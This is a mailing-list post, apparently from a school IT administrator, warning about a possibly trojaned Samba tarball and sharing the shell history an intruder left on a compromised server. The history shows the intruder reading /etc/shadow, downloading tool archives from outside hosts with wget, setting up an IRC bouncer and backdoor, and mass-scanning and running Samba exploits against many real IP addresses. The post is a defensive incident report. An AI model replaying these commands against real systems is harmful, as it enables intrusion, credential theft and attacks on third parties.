Faked samba packages / rootkit?
Does anybody know of these samba packages?
http://ftp.cvut.cz/samba/samba-latest.tar.gz
AFAICS they are faked and contain some kind of rootkit (you can see
this in the history below. the server this history is from is taken
offline for security reasons, and nobody is there till 7th Jan I
can't give you more details)
144 w
145 cat /etc/issue
146 uname -a
147 cat /etc/shadow
148 cd /usr/lib
149 wget http://ftp.cvut.cz/samba/samba-latest.tar.gz
150 5tar zxvf samba-latest.tar.gz
151 tar zxvf samba-latest.tar.gz
152 rm -rf samba-latest.tar.gz
153 cd samba-3.0.0/
154 cd source/
155 ./configure
156 ./make
157 ls
158 make
159 w
160 ls
161 cd ..
162 cd ..
163 cd ..
164 cd ..
165 ls
166 cat /etc/shadows
167 cat /etc/shadow
168 cat /etc/hosts
169 cat /proc/cpuinfo
170 socklsit
171 sockslist
172 w
173 killall -9 in.identd
174 killall -9 smbd
175 killall -9 nmbd
176 smbd -D
177 nmbd -D
178 5 locate in.identd
179 locate in.identd
180 cd /var/tmp
181 ls
182 cd .nlp
183 wget geocities.com/st3lly/cmd.tg
184 wget http://geocities.com/st3lly/cmd.tg
185 wget http://geocities.com/st3lly/cmd.tgz
186 tar zxvf cmd.tgz
187 cd cmd
188 ls
189 ./stealth 0 193.95.215.54 6666 6668
190 ./stealth 193.95.215.54 6666 6668
191 ./stealth 193.95.215.54 6667
192 w
193 cd /var/tmp
194 cd .nlp
195 wget http://members.xoom.it/pippo46/selena.tgz
196 wget http://62.211.66.12/pippo46/selena.tgz
197 tar zxvf selena.tgz
198 rm selena
199 rm selena.tgz
200 cd selena/
201 ls
202 ./assl 212.213
203 uname -a
204 cd var/tmp/.nlp
205 ls
206 cd .nlp
207 cd /var/tmp
208 cd .nlp
209 ls
210 cd /tmp/
211 cd rk
212 ls
213 wget http://members.xoom.it/vendett/psymag.tar.gz
214 wget http://62.211.66.12/vendett/psymag.tar.gz
215 tar zxvf psymag.tar.gz
216 rm psymag.tar.gz
217 cd psybnc
218 wget http://62.211.66.12/vendett/psybnc.conf
219 ./psybnc
220 cd ..
221 rm -fr psybnc
222 wget http://62.211.66.12/pippo46/asmb.tar
223 tar zyvf asmb.tar
224 tar zxvf asmb.tar
225 rm asmb.tar
226 cd w00t/
227 ./asmb 120
228 ./asmb 110
229 ./asmb 217
230 ./asmb 217.229
231 cat woot.log
232 ./samba -b 0 -v 217.229.113.107
233 ./asmb 217.46
234 ./asmb 217.228
235 cd /tmp/rk
236 cd w00t/
237 ./asmb 194.142
238 ./samba -b 0 -v 194.142.156.50
239 ./asmb 195.165
240 ./asmb 195.240
241 ./asmb 195.80
242 cat woot.log
243 ./samba -b 0 -v 217.229.113.107
244 ./samba -b 0 -v 217.229.203.3
245 ./samba -b 0 -v 217.229.230.36
246 cd /tmp
247 ls
248 cd rk
249 cd w00t/
250 cat woot.log
251 ./samba -b 0 -v 81.182.126.85
252 ./samba -b 0 -v 81.182.126.85
253 cat woot.log
254 ./samba -b 0 -v 81.182.40.114
255 ./samba -b 0 -v 81.209
256 ./asmb 81.209
257 ./asmb 81.42
258 ./asmb 81.248
259 w
260 cd /var/tmp/.nlp
261 ls
262 cd ..
263 cd rk
264 cd /tmp/rk/.nlp
265 cd /tmp/
266 cd rk
267 cd .nlp
268 cd w00t/
269 ./asmb 195.97
270 ./asmb 195.166
271 ./asmb 81.183
272 cat woot.log
273 ./samba -b 0 -v 81.183.0.29
274 ./asmb 81.182
275 cat woot.log
276 ./samba -b 0 -v 81.182.40.114
277 ./samba -b 0 -v 81.182.40.114
278 ./samba -b 0 -v 81.182.40.114
279 ./samba -b 0 -v 81.182.90.152
280 cat woot.log
281 ./samba -b 0 -v 81.183.0.29
282 cat /proc/cpuinfo
283 cat /etc/hosts
284 w
285 cat /etc/issue
286 fuser -v 113/tcp
287 cat /etc/inetd.conf |grep -i ident
288 5vi /etc/inetd.conf
289 vi /etc/inetd.conf
290 vi /etc/inetd.conf
291 5killall -HUP inetd
292 killall -HUP inetd
293 cd /var/tmp
294 ls
295 cd /tmp
296 ls
297 cd rk
298 ls
299 cd ..
300 cd rk
301 wget http://members.xoom.it/vendett/psymag.tar.gz
302 wget http://62.211.66.12/vendett/psymag.tar.gz
303 tar zxvf psymag.tar.gz
304 ls
305 tar zxf psymag.tar.gz
306 tar zxvf psymag.tar.gz
307 tar xvfz psymag.tar.gz
308 rm psymag.tar.gz
309 ls
310 cd /usr/lib/.nlp
311 cd var/tmp
312 cd /var/tmp
313 ls
314 cd .nlp
315 ls
316 wget http://members.xoom.it/vendett/psymag.tar.gz
317 wget http://62.211.66.12/vendett/psymag.tar.gz
318 tar xvfz psymag.tar.gz
319 tar -xvfz psymag.tar.gz
320 rm psymag.tar.gz
321 w
322 wget http://62.211.66.12/pippo46/psy.tar.gz
323 tar zxvf psy.tar.gz
324 rm psy.tar.gz
325 wget http://62.211.66.12/pippo46/psyBNC2.3.1.tar
326 tar xf psyBNC2.3.1.tar
327 ls
328 cd psybnc.
329 cd psybnc
330 ls
331 wget http://62.211.66.12/pippo46/psybnc.conf
332 ./psybnc
333 ls
334 menuconf
335 ./menuconf
336 ./make
337 cd menuconf
338 ld
339 ld
340 ls
341 cd ..
342 ls
343 make
344 ls
345 ./psybnc
346 vi psybnc.conf
347 ./psybnc
348 vi psybnc.conf
349 ./psybnc
350 vi psybnc.conf
351 ./psybnc
352 cd ..
353 adduser
354 cd /tmo/rk/w00t
355 cd /tmp/rk/w00t
356 ./samba -b 0 -v 193.170.8.129
357 cd /tmp/rk/w00t
358 ./samba -b 0 -v 211.21.64.204
359 ./samba -b 0 -v 211.21.64.204
360 ./samba -b 0 -v 128.210.147.242
361 cd /tmp/rk/w00t
362 ./asmb 128.210
363 ./asmb 128.211
364 ./asmb 128.209
365 ./asmb 128
366 ./asmb 210.86
367 ./asmb 128
368 ./asmb 219
369 ./asmb 219.111
370 ./asmb 219.166
371 cat woot.log
372 ./samba -b 0 -v 219.166.79.186
373 ./samba -b 0 -v 219.166.81.34
374 ./asmb 219.80
375 cat woot.log
376 ./asmb 219.91
377 ./samba -b 0 -v 219.91.104.72
378 ./asmb 211.23
379 ./asmb 212.54
380 ./asmb 212.163
381 ./asmb 212.191
382 cd ..
383 wget xplo.150m.com/allsun.tgz
384 tar zxvf allsun.tgz
385 tar xf allsun.tgz
386 gunzip allsun.tgz
387 cd w00t/
388 ./asmb 10.12
389 ./asmb 212.37
390 ./asmb 215
391 ./asmb 189
392 ./asmb 140
393 ./asmb 82.129
394 ./asmb 82.39
395 cd /tmp/rk
396 cd w00t/
397 ./samba -b 0 -v 213.81.174.155
398 cat woot.log
399 cd ..
400 ls
401 cd w00t/
402 ./asmb 213.81
403 cd /var/tmp/.nlp
404 cd selena/
405 ls
406 ./ssx
407 cd /tmp
408 cd rk
409 cd w00t/
410 ./asmb 210
411 ./asmb 210.146
412 ./asmb 210.192
413 ls
414 ./samba -b 0 -v 128.210.147.242
415 ./samba -b 0 -v 128.210.147.241
416 ./samba -b 0 -v 128.210.147.243
417 ./samba -b 0 -v 128.210.147.241
418 ./samba -b 0 -v 128.210.147.242
419 ./samba -b 0 -v 128.210.147.242
420 ./asmb 210.233
421 ./samba -b 0 -v 210.233.23.147
422 ./asmb 210.59
423 ./asmb 211
424 ./asmb 211.130
425 cat woot.lo
426 ./asmb 211.21
427 cat woot.log
428 ./samba -b 0 -v 211.21.64.204
429 ./asmb 211.22
430 ./asmb 212
431 ./asmb 212.37
432 ./asmb 212.101
433 ./asmb 212.185
434 ./asmb 212.36
435 ./asmb 212.80
436 ./asmb 214
437 ./asmb 158
438 ./asmb 02
439 ./asmb 82
440 ./asmb 82.161
441 ./asmb 82.255
442 cd /tmp/rk/w00t
443 ls
444 ./asmb 83
445 ./asmb 193.40
446 ./asmb 212.28
447 ./asmb 172
448 ./asmb 172.163
449 ./asmb 62.218
450 ./asmb 61.189
451 ./asmb 63
452 ./asmb 62.233
453 ./asmb 62.146
454 ./asmb 62.140
455 ./asmb 62
456 ./asmb 62.174
457 ./asmb 62.32
458 ./asmb 62.57
459 ./asmb 62.90
460 ./asmb 207.44
461 ./asmb 213.64
462 ./asmb 213.52
463 ./asmb 213.60
464 cat woot.log
465 ./samba -b 0 -v 213.60.109.1
466 ./samba -b 0 -v 213.60.109.1
467 wget http://members.xoom.it/pippo46/php.tar
468 tar xf php.tar
469 ls
470 cd php.tar
471 cd ..
472 cd php.tar
473 wget http://members.xoom.it/pippo46/php.tar
474 tar xf php.tar
475 ls
476 wget http://62.211.66.12/pippo46/php.tar
477 ./Start 62.162
478 ls
479 tar xf php.tar
480 tar zxvf php.tar
481 5http://www.zorgii.0catch.com/phpxpl.tar.gz
482 wget http://www.zorgii.0catch.com/phpxpl.tar.gz
483 tar zxvf phpxpl.tar.gz
484 5gunzip phpxpl.tar.gz
485 gunzip phpxpl.tar.gz
486 cd w00t/
487 ./asmb 213.61
488 ./samba -b 0 -v 213.60.109.1
489 ./asmb 213.62
490 ./asmb 213.58
491 ./asmb 213.57
492 ./asmb 213.70
493 ./asmb 213.80
494 ./samba -b 0 -v 81.183.0.29
495 w
496 cd /var/tmp
497 cd /tmp/rk
498 cd w00t/
499 ./samba -b 0 -v 211.22.94.147
500 ./samba -b 0 -v 194.95.226.21
--
\\\ ||| /// _\=/_
( @ @ ) (o o)
+--------oOOo-(_)-oOOo--------------------------oOOo-(_)-oOOo------+
| Markus Schabel TGM - Die Schule der Technik www.tgm.ac.at |
| IT-Service A-1200 Wien, Wexstrasse 19-23 net.tgm.ac.at |
| markus.schabel@tgm.ac.at Tel.: +43(1)33126/316 |
| markus.schabel@members.fsf.org Fax.: +43(1)33126/154 |
| FSF Associate Member #597, Linux User #259595 (counter.li.org) |
| oOOo Yet Another Spam Trap: oOOo |
| ( ) oOOo yast@tgm.ac.at ( ) oOOo |
+--------\ (----( )--------------------------\ ( -----( )-----+
\_) ) / \_) ) /
(_/ (_/
Computers are like airconditioners:
They stop working properly if you open windows.
Reply to: